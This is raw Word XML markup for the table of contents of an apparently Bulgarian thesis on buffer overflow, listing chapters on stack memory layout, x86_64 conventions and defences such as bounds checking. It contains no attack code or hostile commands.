    <w:p w:rsidR="00CC22A1" w:rsidRDefault="00112660" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>CD:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00326004" w:rsidRDefault="00326004">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="bg"/>
        </w:rPr>
        <w:id w:val="16133427"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w:rsidR="00326004" w:rsidRPr="00875CB1" w:rsidRDefault="00326004">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:rPr>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="bg-BG"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00875CB1">
            <w:rPr>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="bg-BG"/>
            </w:rPr>
            <w:t>Съдържание</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00326004">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00875CB1">
            <w:rPr>
              <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00875CB1">
            <w:rPr>
              <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00875CB1">
            <w:rPr>
              <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc3540744" w:history="1">
            <w:r w:rsidR="00C23AD4" w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Увод</w:t>
            </w:r>
            <w:r w:rsidR="00C23AD4">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C23AD4">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C23AD4">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540744 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00C23AD4">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00C23AD4">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C23AD4">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00C23AD4">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540745" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1. Първа глава въведение в buffer overflow</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540745 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540746" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Разпределение на паметта</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540746 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540747" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>1.1.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Stack</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540747 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540748" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>1.1.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Особености при x86_64</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540748 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540749" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>1.1.3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>System V конвенция</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540749 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540750" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Buffer overflow</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540750 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540751" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Защити</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540751 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540752" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>1.3.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Static analysis</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540752 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540753" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>1.3.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Сигурни функции (bounds checking)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540753 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540754" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>1.3.3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Употреба на езици от по-високо ниво (automatic bounds checking)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540754 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540755" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>1.3.4.</w:t>
            </w:r>
            <w:r>
